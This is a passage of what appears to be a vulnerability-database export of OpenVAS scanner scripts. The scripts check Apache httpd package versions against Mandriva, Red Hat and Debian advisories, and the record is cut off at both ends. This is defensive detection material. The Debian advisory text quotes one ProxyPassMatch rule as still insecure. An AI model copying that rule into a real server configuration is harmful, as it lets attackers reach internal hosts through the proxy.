exit(99); # Not vulnerable.\n exit(0);\n}\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_scgi\", rpm:\"apache-mod_proxy_scgi~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_reqtimeout\", rpm:\"apache-mod_reqtimeout~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-02T10:57:05", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2012-07-09T00:00:00", "type": "openvas", "title": "RedHat Update for httpd RHSA-2011:1391-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192", "CVE-2011-3348"], "modified": "2017-12-27T00:00:00", "id": "OPENVAS:870617", "href": "http://plugins.openvas.org/nasl.php?oid=870617", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2011:1391-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n It was discovered that mod_proxy_ajp incorrectly returned an "Internal\n Server Error" response when processing certain malformed HTTP requests,\n which caused the back-end server to be marked as failed in configurations\n where mod_proxy was used in load balancer mode. A remote attacker could\n cause mod_proxy to not send requests to back-end AJP (Apache JServ\n Protocol) servers for the retry timeout period or until all back-end\n servers were marked as failed. (CVE-2011-3348)\n\n Red Hat would like to thank Context Information Security for reporting the\n CVE-2011-3368 issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736592)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\n\ntag_affected = \"httpd on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2011-October/msg00015.html\");\n script_id(870617);\n script_version(\"$Revision: 8249 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 07:29:56 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:34:25 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\", \"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2011:1391-01\");\n script_name(\"RedHat Update for httpd RHSA-2011:1391-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:57:25", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2012-02-27T00:00:00", "type": "openvas", "title": "RedHat Update for httpd RHSA-2012:0323-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053", "CVE-2011-3368"], "modified": "2018-01-01T00:00:00", "id": "OPENVAS:870571", "href": "http://plugins.openvas.org/nasl.php?oid=870571", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2012:0323-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1392) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request.\n (CVE-2011-3639)\n\n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n ".htaccess" file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the "apache" user.\n (CVE-2011-3607)\n\n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon will be restarted automatically.\";\n\ntag_affected = \"httpd on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00063.html\");\n script_id(870571);\n script_version(\"$Revision: 8265 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-01 07:29:23 +0100 (Mon, 01 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-27 11:17:07 +0530 (Mon, 27 Feb 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\",\n \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"RHSA\", value: \"2012:0323-01\");\n script_name(\"RedHat Update for httpd RHSA-2012:0323-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:39:04", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-02-27T00:00:00", "type": "openvas", "title": "RedHat Update for httpd RHSA-2012:0323-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053", "CVE-2011-3368"], "modified": "2019-03-12T00:00:00", "id": "OPENVAS:1361412562310870571", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870571", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2012:0323-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00063.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870571\");\n script_version(\"$Revision: 14114 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 12:48:52 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-27 11:17:07 +0530 (Mon, 27 Feb 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\",\n \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"RHSA\", value:\"2012:0323-01\");\n script_name(\"RedHat Update for httpd RHSA-2012:0323-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", value:\"httpd on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1392) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request.\n (CVE-2011-3639)\n\n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n '.htaccess' file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the 'apache' user.\n (CVE-2011-3607)\n\n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-24T12:50:46", "description": "The remote host is missing an update to apache2\nannounced via advisory DSA 2405-1.", "cvss3": {}, "published": "2012-02-13T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2405-1 (apache2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053", "CVE-2011-3368"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:70724", "href": "http://plugins.openvas.org/nasl.php?oid=70724", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2405_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2405-1 (apache2)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been found in the Apache HTTPD Server:\n\nCVE-2011-3607:\n\nAn integer overflow in ap_pregsub() could allow local attackers to\nexecute arbitrary code at elevated privileges via crafted .htaccess\nfiles.\n\nCVE-2011-3368 CVE-2011-3639 CVE-2011-4317:\n\nThe Apache HTTP Server did not properly validate the request URI for\nproxied requests. In certain reverse proxy configurations using the\nProxyPassMatch directive or using the RewriteRule directive with the\n[P] flag, a remote attacker could make the proxy connect to an\narbitrary server. The could allow the attacker to access internal\nservers that are not otherwise accessible from the outside.\n\nThe three CVE ids denote slightly different variants of the same\nissue.\n\nNote that, even with this issue fixed, it is the responsibility of\nthe administrator to ensure that the regular expression replacement\npattern for the target URI does not allow a client to append arbitrary\nstrings to the host or port parts of the target URI. For example, the\nconfiguration\n\nProxyPassMatch ^/mail(.*) http://internal-host$1\n\nis still insecure and should be replaced by one of the following\nconfigurations:\n\nProxyPassMatch ^/mail(/.*) http://internal-host$1\nProxyPassMatch ^/mail/(.*) http://internal-host/$1\n\nCVE-2012-0031:\n\nAn apache2 child process could cause the parent process to crash\nduring shutdown. This is a violation of the privilege separation\nbetween the apache2 processes and could potentially be used to worsen\nthe impact of other vulnerabilities.\n\nCVE-2012-0053:\n\nThe response message for error code 400 (bad request) could be used to\nexpose httpOnly cookies. This could allow a remote attacker using\ncross site scripting to steal authentication cookies.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed in\nversion apache2 2.2.9-10+lenny12.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion apache2 2.2.16-6+squeeze6\n\nFor the testing distribution (wheezy), these problems will be fixed in\nversion 2.2.22-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.2.22-1.\n\nWe recommend that you upgrade your apache2 packages.\";\ntag_summary = \"The remote host is missing an update to apache2\nannounced via advisory DSA 2405-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202405-1\";\n\nif(description)\n{\n script_id(70724);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3368\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-13 11:19:29 -0500 (Mon, 13 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2405-1 (apache2)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-src\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.16-6+squeeze6\", 